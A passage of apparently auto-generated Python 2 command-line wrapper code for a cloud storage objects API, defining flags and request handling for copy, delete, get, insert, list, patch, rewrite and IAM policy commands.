flags.DEFINE_string(
'object',
None,
u'A Object resource to be passed as the request body.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to noAcl, unless the object '
u'resource specifies the acl property, when it defaults to full.',
flag_values=fv)
flags.DEFINE_string(
'sourceGeneration',
None,
u'If present, selects a specific revision of the source object (as '
u'opposed to the latest version, the default).',
flag_values=fv)
flags.DEFINE_string(
'download_filename',
'',
'Filename to use for download.',
flag_values=fv)
flags.DEFINE_boolean(
'overwrite',
'False',
'If True, overwrite the existing file when downloading.',
flag_values=fv)
def RunWithArgs(self, sourceBucket, sourceObject, destinationBucket, destinationObject):
"""Copies a source object to a destination object. Optionally overrides
metadata.
Args:
sourceBucket: Name of the bucket in which to find the source object.
sourceObject: Name of the source object. For information about how to
URL encode object names to be path safe, see Encoding URI Path Parts.
destinationBucket: Name of the bucket in which to store the new object.
Overrides the provided object metadata's bucket value, if any.For
information about how to URL encode object names to be path safe, see
Encoding URI Path Parts.
destinationObject: Name of the new object. Required when the object
metadata is not otherwise provided. Overrides the object metadata's
name value, if any.
Flags:
destinationPredefinedAcl: Apply a predefined set of access controls to
the destination object.
ifGenerationMatch: Makes the operation conditional on whether the
destination object's current generation matches the given value.
ifGenerationNotMatch: Makes the operation conditional on whether the
destination object's current generation does not match the given
value.
ifMetagenerationMatch: Makes the operation conditional on whether the
destination object's current metageneration matches the given value.
ifMetagenerationNotMatch: Makes the operation conditional on whether the
destination object's current metageneration does not match the given
value.
ifSourceGenerationMatch: Makes the operation conditional on whether the
source object's generation matches the given value.
ifSourceGenerationNotMatch: Makes the operation conditional on whether
the source object's generation does not match the given value.
ifSourceMetagenerationMatch: Makes the operation conditional on whether
the source object's current metageneration matches the given value.
ifSourceMetagenerationNotMatch: Makes the operation conditional on
whether the source object's current metageneration does not match the
given value.
object: A Object resource to be passed as the request body.
projection: Set of properties to return. Defaults to noAcl, unless the
object resource specifies the acl property, when it defaults to full.
sourceGeneration: If present, selects a specific revision of the source
object (as opposed to the latest version, the default).
download_filename: Filename to use for download.
overwrite: If True, overwrite the existing file when downloading.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsCopyRequest(
sourceBucket=sourceBucket.decode('utf8'),
sourceObject=sourceObject.decode('utf8'),
destinationBucket=destinationBucket.decode('utf8'),
destinationObject=destinationObject.decode('utf8'),
)
if FLAGS['destinationPredefinedAcl'].present:
request.destinationPredefinedAcl = messages.StorageObjectsCopyRequest.DestinationPredefinedAclValueValuesEnum(FLAGS.destinationPredefinedAcl)
if FLAGS['ifGenerationMatch'].present:
request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
if FLAGS['ifGenerationNotMatch'].present:
request.ifGenerationNotMatch = int(FLAGS.ifGenerationNotMatch)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
if FLAGS['ifSourceGenerationMatch'].present:
request.ifSourceGenerationMatch = int(FLAGS.ifSourceGenerationMatch)
if FLAGS['ifSourceGenerationNotMatch'].present:
request.ifSourceGenerationNotMatch = int(FLAGS.ifSourceGenerationNotMatch)
if FLAGS['ifSourceMetagenerationMatch'].present:
request.ifSourceMetagenerationMatch = int(FLAGS.ifSourceMetagenerationMatch)
if FLAGS['ifSourceMetagenerationNotMatch'].present:
request.ifSourceMetagenerationNotMatch = int(FLAGS.ifSourceMetagenerationNotMatch)
if FLAGS['object'].present:
request.object = apitools_base.JsonToMessage(messages.Object, FLAGS.object)
if FLAGS['projection'].present:
request.projection = messages.StorageObjectsCopyRequest.ProjectionValueValuesEnum(FLAGS.projection)
if FLAGS['sourceGeneration'].present:
request.sourceGeneration = int(FLAGS.sourceGeneration)
download = None
if FLAGS.download_filename:
download = apitools_base.Download.FromFile(FLAGS.download_filename, overwrite=FLAGS.overwrite,
progress_callback=apitools_base.DownloadProgressPrinter,
finish_callback=apitools_base.DownloadCompletePrinter)
result = client.objects.Copy(
request, global_params=global_params, download=download)
print apitools_base_cli.FormatOutput(result)
class ObjectsDelete(apitools_base_cli.NewCmd):
"""Command wrapping objects.Delete."""
usage = """objects_delete <bucket> <object>"""
def __init__(self, name, fv):
super(ObjectsDelete, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, permanently deletes a specific revision of this object '
u'(as opposed to the latest version, the default).',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'generation matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'generation does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration does not match the given value.',
flag_values=fv)
def RunWithArgs(self, bucket, object):
"""Deletes an object and its metadata. Deletions are permanent if
versioning is not enabled for the bucket, or if the generation parameter
is used.
Args:
bucket: Name of the bucket in which the object resides.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
Flags:
generation: If present, permanently deletes a specific revision of this
object (as opposed to the latest version, the default).
ifGenerationMatch: Makes the operation conditional on whether the
object's current generation matches the given value.
ifGenerationNotMatch: Makes the operation conditional on whether the
object's current generation does not match the given value.
ifMetagenerationMatch: Makes the operation conditional on whether the
object's current metageneration matches the given value.
ifMetagenerationNotMatch: Makes the operation conditional on whether the
object's current metageneration does not match the given value.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsDeleteRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['ifGenerationMatch'].present:
request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
if FLAGS['ifGenerationNotMatch'].present:
request.ifGenerationNotMatch = int(FLAGS.ifGenerationNotMatch)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
result = client.objects.Delete(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectsGet(apitools_base_cli.NewCmd):
"""Command wrapping objects.Get."""
usage = """objects_get <bucket> <object>"""
def __init__(self, name, fv):
super(ObjectsGet, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationMatch',
None,
u"Makes the operation conditional on whether the object's generation "
u'matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's generation "
u'does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration does not match the given value.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to noAcl.',
flag_values=fv)
flags.DEFINE_string(
'download_filename',
'',
'Filename to use for download.',
flag_values=fv)
flags.DEFINE_boolean(
'overwrite',
'False',
'If True, overwrite the existing file when downloading.',
flag_values=fv)
def RunWithArgs(self, bucket, object):
"""Retrieves an object or its metadata.
Args:
bucket: Name of the bucket in which the object resides.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
ifGenerationMatch: Makes the operation conditional on whether the
object's generation matches the given value.
ifGenerationNotMatch: Makes the operation conditional on whether the
object's generation does not match the given value.
ifMetagenerationMatch: Makes the operation conditional on whether the
object's current metageneration matches the given value.
ifMetagenerationNotMatch: Makes the operation conditional on whether the
object's current metageneration does not match the given value.
projection: Set of properties to return. Defaults to noAcl.
download_filename: Filename to use for download.
overwrite: If True, overwrite the existing file when downloading.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsGetRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['ifGenerationMatch'].present:
request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
if FLAGS['ifGenerationNotMatch'].present:
request.ifGenerationNotMatch = int(FLAGS.ifGenerationNotMatch)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
if FLAGS['projection'].present:
request.projection = messages.StorageObjectsGetRequest.ProjectionValueValuesEnum(FLAGS.projection)
download = None
if FLAGS.download_filename:
download = apitools_base.Download.FromFile(FLAGS.download_filename, overwrite=FLAGS.overwrite,
progress_callback=apitools_base.DownloadProgressPrinter,
finish_callback=apitools_base.DownloadCompletePrinter)
result = client.objects.Get(
request, global_params=global_params, download=download)
print apitools_base_cli.FormatOutput(result)
class ObjectsGetIamPolicy(apitools_base_cli.NewCmd):
"""Command wrapping objects.GetIamPolicy."""
usage = """objects_getIamPolicy <bucket> <object>"""
def __init__(self, name, fv):
super(ObjectsGetIamPolicy, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
def RunWithArgs(self, bucket, object):
"""Returns an IAM policy for the specified object.
Args:
bucket: Name of the bucket in which the object resides.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsGetIamPolicyRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
result = client.objects.GetIamPolicy(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectsInsert(apitools_base_cli.NewCmd):
"""Command wrapping objects.Insert."""
usage = """objects_insert <bucket>"""
def __init__(self, name, fv):
super(ObjectsInsert, self).__init__(name, fv)
flags.DEFINE_string(
'contentEncoding',
None,
u'If set, sets the contentEncoding property of the final object to '
u'this value. Setting this parameter is equivalent to setting the '
u'contentEncoding metadata property. This can be useful when '
u'uploading an object with uploadType=media to indicate the encoding '
u'of the content being uploaded.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'generation matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'generation does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'name',
None,
u'Name of the object. Required when the object metadata is not '
u"otherwise provided. Overrides the object metadata's name value, if "
u'any. For information about how to URL encode object names to be '
u'path safe, see Encoding URI Path Parts.',
flag_values=fv)
flags.DEFINE_string(
'object',
None,
u'A Object resource to be passed as the request body.',
flag_values=fv)
flags.DEFINE_enum(
'predefinedAcl',
u'authenticatedRead',
[u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
u'Apply a predefined set of access controls to this object.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to noAcl, unless the object '
u'resource specifies the acl property, when it defaults to full.',
flag_values=fv)
flags.DEFINE_string(
'upload_filename',
'',
'Filename to use for upload.',
flag_values=fv)
flags.DEFINE_string(
'upload_mime_type',
'',
'MIME type to use for the upload. Only needed if the extension on '
'--upload_filename does not determine the correct (or any) MIME '
'type.',
flag_values=fv)
flags.DEFINE_string(
'download_filename',
'',
'Filename to use for download.',
flag_values=fv)
flags.DEFINE_boolean(
'overwrite',
'False',
'If True, overwrite the existing file when downloading.',
flag_values=fv)
def RunWithArgs(self, bucket):
"""Stores a new object and metadata.
Args:
bucket: Name of the bucket in which to store the new object. Overrides
the provided object metadata's bucket value, if any.
Flags:
contentEncoding: If set, sets the contentEncoding property of the final
object to this value. Setting this parameter is equivalent to setting
the contentEncoding metadata property. This can be useful when
uploading an object with uploadType=media to indicate the encoding of
the content being uploaded.
ifGenerationMatch: Makes the operation conditional on whether the
object's current generation matches the given value.
ifGenerationNotMatch: Makes the operation conditional on whether the
object's current generation does not match the given value.
ifMetagenerationMatch: Makes the operation conditional on whether the
object's current metageneration matches the given value.
ifMetagenerationNotMatch: Makes the operation conditional on whether the
object's current metageneration does not match the given value.
name: Name of the object. Required when the object metadata is not
otherwise provided. Overrides the object metadata's name value, if
any. For information about how to URL encode object names to be path
safe, see Encoding URI Path Parts.
object: A Object resource to be passed as the request body.
predefinedAcl: Apply a predefined set of access controls to this object.
projection: Set of properties to return. Defaults to noAcl, unless the
object resource specifies the acl property, when it defaults to full.
upload_filename: Filename to use for upload.
upload_mime_type: MIME type to use for the upload. Only needed if the
extension on --upload_filename does not determine the correct (or any)
MIME type.
download_filename: Filename to use for download.
overwrite: If True, overwrite the existing file when downloading.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsInsertRequest(
bucket=bucket.decode('utf8'),
)
if FLAGS['contentEncoding'].present:
request.contentEncoding = FLAGS.contentEncoding.decode('utf8')
if FLAGS['ifGenerationMatch'].present:
request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
if FLAGS['ifGenerationNotMatch'].present:
request.ifGenerationNotMatch = int(FLAGS.ifGenerationNotMatch)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
if FLAGS['name'].present:
request.name = FLAGS.name.decode('utf8')
if FLAGS['object'].present:
request.object = apitools_base.JsonToMessage(messages.Object, FLAGS.object)
if FLAGS['predefinedAcl'].present:
request.predefinedAcl = messages.StorageObjectsInsertRequest.PredefinedAclValueValuesEnum(FLAGS.predefinedAcl)
if FLAGS['projection'].present:
request.projection = messages.StorageObjectsInsertRequest.ProjectionValueValuesEnum(FLAGS.projection)
upload = None
if FLAGS.upload_filename:
upload = apitools_base.Upload.FromFile(
FLAGS.upload_filename, FLAGS.upload_mime_type,
progress_callback=apitools_base.UploadProgressPrinter,
finish_callback=apitools_base.UploadCompletePrinter)
download = None
if FLAGS.download_filename:
download = apitools_base.Download.FromFile(FLAGS.download_filename, overwrite=FLAGS.overwrite,
progress_callback=apitools_base.DownloadProgressPrinter,
finish_callback=apitools_base.DownloadCompletePrinter)
result = client.objects.Insert(
request, global_params=global_params, upload=upload, download=download)
print apitools_base_cli.FormatOutput(result)
class ObjectsList(apitools_base_cli.NewCmd):
"""Command wrapping objects.List."""
usage = """objects_list <bucket>"""
def __init__(self, name, fv):
super(ObjectsList, self).__init__(name, fv)
flags.DEFINE_string(
'delimiter',
None,
u'Returns results in a directory-like mode. items will contain only '
u'objects whose names, aside from the prefix, do not contain '
u'delimiter. Objects whose names, aside from the prefix, contain '
u'delimiter will have their name, truncated after the delimiter, '
u'returned in prefixes. Duplicate prefixes are omitted.',
flag_values=fv)
flags.DEFINE_integer(
'maxResults',
None,
u'Maximum number of items plus prefixes to return. As duplicate '
u'prefixes are omitted, fewer total results may be returned than '
u'requested. The default value of this parameter is 1,000 items.',
flag_values=fv)
flags.DEFINE_string(
'pageToken',
None,
u'A previously-returned page token representing part of the larger '
u'set of results to view.',
flag_values=fv)
flags.DEFINE_string(
'prefix',
None,
u'Filter results to objects whose names begin with this prefix.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to noAcl.',
flag_values=fv)
flags.DEFINE_boolean(
'versions',
None,
u'If true, lists all versions of an object as distinct results. The '
u'default is false. For more information, see Object Versioning.',
flag_values=fv)
def RunWithArgs(self, bucket):
"""Retrieves a list of objects matching the criteria.
Args:
bucket: Name of the bucket in which to look for objects.
Flags:
delimiter: Returns results in a directory-like mode. items will contain
only objects whose names, aside from the prefix, do not contain
delimiter. Objects whose names, aside from the prefix, contain
delimiter will have their name, truncated after the delimiter,
returned in prefixes. Duplicate prefixes are omitted.
maxResults: Maximum number of items plus prefixes to return. As
duplicate prefixes are omitted, fewer total results may be returned
than requested. The default value of this parameter is 1,000 items.
pageToken: A previously-returned page token representing part of the
larger set of results to view.
prefix: Filter results to objects whose names begin with this prefix.
projection: Set of properties to return. Defaults to noAcl.
versions: If true, lists all versions of an object as distinct results.
The default is false. For more information, see Object Versioning.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsListRequest(
bucket=bucket.decode('utf8'),
)
if FLAGS['delimiter'].present:
request.delimiter = FLAGS.delimiter.decode('utf8')
if FLAGS['maxResults'].present:
request.maxResults = FLAGS.maxResults
if FLAGS['pageToken'].present:
request.pageToken = FLAGS.pageToken.decode('utf8')
if FLAGS['prefix'].present:
request.prefix = FLAGS.prefix.decode('utf8')
if FLAGS['projection'].present:
request.projection = messages.StorageObjectsListRequest.ProjectionValueValuesEnum(FLAGS.projection)
if FLAGS['versions'].present:
request.versions = FLAGS.versions
result = client.objects.List(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectsPatch(apitools_base_cli.NewCmd):
"""Command wrapping objects.Patch."""
usage = """objects_patch <bucket> <object>"""
def __init__(self, name, fv):
super(ObjectsPatch, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'generation matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'generation does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u"Makes the operation conditional on whether the object's current "
u'metageneration does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'objectResource',
None,
u'A Object resource to be passed as the request body.',
flag_values=fv)
flags.DEFINE_enum(
'predefinedAcl',
u'authenticatedRead',
[u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
u'Apply a predefined set of access controls to this object.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to full.',
flag_values=fv)
def RunWithArgs(self, bucket, object):
"""Updates an object's metadata. This method supports patch semantics.
Args:
bucket: Name of the bucket in which the object resides.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
ifGenerationMatch: Makes the operation conditional on whether the
object's current generation matches the given value.
ifGenerationNotMatch: Makes the operation conditional on whether the
object's current generation does not match the given value.
ifMetagenerationMatch: Makes the operation conditional on whether the
object's current metageneration matches the given value.
ifMetagenerationNotMatch: Makes the operation conditional on whether the
object's current metageneration does not match the given value.
objectResource: A Object resource to be passed as the request body.
predefinedAcl: Apply a predefined set of access controls to this object.
projection: Set of properties to return. Defaults to full.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsPatchRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['ifGenerationMatch'].present:
request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
if FLAGS['ifGenerationNotMatch'].present:
request.ifGenerationNotMatch = int(FLAGS.ifGenerationNotMatch)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
if FLAGS['objectResource'].present:
request.objectResource = apitools_base.JsonToMessage(messages.Object, FLAGS.objectResource)
if FLAGS['predefinedAcl'].present:
request.predefinedAcl = messages.StorageObjectsPatchRequest.PredefinedAclValueValuesEnum(FLAGS.predefinedAcl)
if FLAGS['projection'].present:
request.projection = messages.StorageObjectsPatchRequest.ProjectionValueValuesEnum(FLAGS.projection)
result = client.objects.Patch(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectsRewrite(apitools_base_cli.NewCmd):
"""Command wrapping objects.Rewrite."""
usage = """objects_rewrite <sourceBucket> <sourceObject> <destinationBucket> <destinationObject>"""
def __init__(self, name, fv):
super(ObjectsRewrite, self).__init__(name, fv)
flags.DEFINE_enum(
'destinationPredefinedAcl',
u'authenticatedRead',
[u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
u'Apply a predefined set of access controls to the destination '
u'object.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationMatch',
None,
u"Makes the operation conditional on whether the destination object's"
u' current generation matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifGenerationNotMatch',
None,
u"Makes the operation conditional on whether the destination object's"
u' current generation does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u"Makes the operation conditional on whether the destination object's"
u' current metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u"Makes the operation conditional on whether the destination object's"
u' current metageneration does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifSourceGenerationMatch',
None,
u"Makes the operation conditional on whether the source object's "
u'generation matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifSourceGenerationNotMatch',
None,
u"Makes the operation conditional on whether the source object's "
u'generation does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifSourceMetagenerationMatch',
None,
u"Makes the operation conditional on whether the source object's "
u'current metageneration matches the given value.',
flag_values=fv)
flags.DEFINE_string(
'ifSourceMetagenerationNotMatch',
None,
u"Makes the operation conditional on whether the source object's "
u'current metageneration does not match the given value.',
flag_values=fv)
flags.DEFINE_string(
'maxBytesRewrittenPerCall',
None,
u'The maximum number of bytes that will be rewritten per rewrite '
u"request. Most callers shouldn't need to specify this parameter - it"
u' is primarily in place to support testing. If specified the value '
u'must be an integral multiple of 1 MiB (1048576). Also, this only '
u'applies to requests where the source and destination span locations'
u' and/or storage classes. Finally, this value must not change across'
u" rewrite calls else you'll get an error that the rewriteToken is "
u'invalid.',
flag_values=fv)
flags.DEFINE_string(
'object',
None,
u'A Object resource to be passed as the request body.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to noAcl, unless the object '
u'resource specifies the acl property, when it defaults to full.',
flag_values=fv)
flags.DEFINE_string(
'rewriteToken',
None,
u'Include this field (from the previous rewrite response) on each '
u'rewrite request after the first one, until the rewrite response '
u"'done' flag is true. Calls that provide a rewriteToken can omit all"
u' other request fields, but if included those fields must match the '
u'values provided in the first rewrite request.',
flag_values=fv)
flags.DEFINE_string(
'sourceGeneration',
None,
u'If present, selects a specific revision of the source object (as '
u'opposed to the latest version, the default).',
flag_values=fv)
def RunWithArgs(self, sourceBucket, sourceObject, destinationBucket, destinationObject):
"""Rewrites a source object to a destination object. Optionally overrides
metadata.
Args:
sourceBucket: Name of the bucket in which to find the source object.
sourceObject: Name of the source object. For information about how to
URL encode object names to be path safe, see Encoding URI Path Parts.
destinationBucket: Name of the bucket in which to store the new object.
Overrides the provided object metadata's bucket value, if any.
destinationObject: Name of the new object. Required when the object
metadata is not otherwise provided. Overrides the object metadata's
name value, if any. For information about how to URL encode object
names to be path safe, see Encoding URI Path Parts.
Flags:
destinationPredefinedAcl: Apply a predefined set of access controls to
the destination object.
ifGenerationMatch: Makes the operation conditional on whether the
destination object's current generation matches the given value.
ifGenerationNotMatch: Makes the operation conditional on whether the
destination object's current generation does not match the given
value.
ifMetagenerationMatch: Makes the operation conditional on whether the
destination object's current metageneration matches the given value.
ifMetagenerationNotMatch: Makes the operation conditional on whether the
destination object's current metageneration does not match the given
value.
ifSourceGenerationMatch: Makes the operation conditional on whether the
source object's generation matches the given value.
ifSourceGenerationNotMatch: Makes the operation conditional on whether
the source object's generation does not match the given value.
ifSourceMetagenerationMatch: Makes the operation conditional on whether
the source object's current metageneration matches the given value.
ifSourceMetagenerationNotMatch: Makes the operation conditional on
whether the source object's current metageneration does not match the
given value.
maxBytesRewrittenPerCall: The maximum number of bytes that will be
rewritten per rewrite request. Most callers shouldn't need to specify
this parameter - it is primarily in place to support testing. If
specified the value must be an integral multiple of 1 MiB (1048576).
Also, this only applies to requests where the source and destination
span locations and/or storage classes. Finally, this value must not
change across rewrite calls else you'll get an error that the
rewriteToken is invalid.
object: A Object resource to be passed as the request body.
projection: Set of properties to return. Defaults to noAcl, unless the
object resource specifies the acl property, when it defaults to full.
rewriteToken: Include this field (from the previous rewrite response) on
each rewrite request after the first one, until the rewrite response
'done' flag is true. Calls that provide a rewriteToken can omit all
other request fields, but if included those fields must match the
values provided in the first rewrite request.
sourceGeneration: If present, selects a specific revision of the source
object (as opposed to the latest version, the default).
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsRewriteRequest(
sourceBucket=sourceBucket.decode('utf8'),
sourceObject=sourceObject.decode('utf8'),
destinationBucket=destinationBucket.decode('utf8'),
destinationObject=destinationObject.decode('utf8'),
)
if FLAGS['destinationPredefinedAcl'].present:
request.destinationPredefinedAcl = messages.StorageObjectsRewriteRequest.DestinationPredefinedAclValueValuesEnum(FLAGS.destinationPredefinedAcl)
if FLAGS['ifGenerationMatch'].present:
request.ifGenerationMatch = int(FLAGS.ifGenerationMatch)
if FLAGS['ifGenerationNotMatch'].present:
request.ifGenerationNotMatch = int(FLAGS.ifGenerationNotMatch)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
if FLAGS['ifSourceGenerationMatch'].present:
request.ifSourceGenerationMatch = int(FLAGS.ifSourceGenerationMatch)
if FLAGS['ifSourceGenerationNotMatch'].present:
request.ifSourceGenerationNotMatch = int(FLAGS.ifSourceGenerationNotMatch)
if FLAGS['ifSourceMetagenerationMatch'].present:
request.ifSourceMetagenerationMatch = int(FLAGS.ifSourceMetagenerationMatch)
if FLAGS['ifSourceMetagenerationNotMatch'].present:
request.ifSourceMetagenerationNotMatch = int(FLAGS.ifSourceMetagenerationNotMatch)
if FLAGS['maxBytesRewrittenPerCall'].present:
request.maxBytesRewrittenPerCall = int(FLAGS.maxBytesRewrittenPerCall)
if FLAGS['object'].present:
request.object = apitools_base.JsonToMessage(messages.Object, FLAGS.object)
if FLAGS['projection'].present:
request.projection = messages.StorageObjectsRewriteRequest.ProjectionValueValuesEnum(FLAGS.projection)
if FLAGS['rewriteToken'].present:
request.rewriteToken = FLAGS.rewriteToken.decode('utf8')
if FLAGS['sourceGeneration'].present:
request.sourceGeneration = int(FLAGS.sourceGeneration)
result = client.objects.Rewrite(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectsSetIamPolicy(apitools_base_cli.NewCmd):
"""Command wrapping objects.SetIamPolicy."""
usage = """objects_setIamPolicy <bucket> <object>"""
def __init__(self, name, fv):
super(ObjectsSetIamPolicy, self).__init__(name, fv)
flags.DEFINE_string(
'generation',
None,
u'If present, selects a specific revision of this object (as opposed '
u'to the latest version, the default).',
flag_values=fv)
flags.DEFINE_string(
'policy',
None,
u'A Policy resource to be passed as the request body.',
flag_values=fv)
def RunWithArgs(self, bucket, object):
"""Updates an IAM policy for the specified object.
Args:
bucket: Name of the bucket in which the object resides.
object: Name of the object. For information about how to URL encode
object names to be path safe, see Encoding URI Path Parts.
Flags:
generation: If present, selects a specific revision of this object (as
opposed to the latest version, the default).
policy: A Policy resource to be passed as the request body.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageObjectsSetIamPolicyRequest(
bucket=bucket.decode('utf8'),
object=object.decode('utf8'),
)
if FLAGS['generation'].present:
request.generation = int(FLAGS.generation)
if FLAGS['policy'].present:
request.policy = apitools_base.JsonToMessage(messages.Policy, FLAGS.policy)
result = client.objects.SetIamPolicy(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ObjectsTestIamPermissions(apitools_base_cli.NewCmd):
"""Command wrapping objects.TestIamPermissions."""
usage = """objects_testIamPermissions <bucket> <object> <permissions>"""
def __init__(self, name, fv):
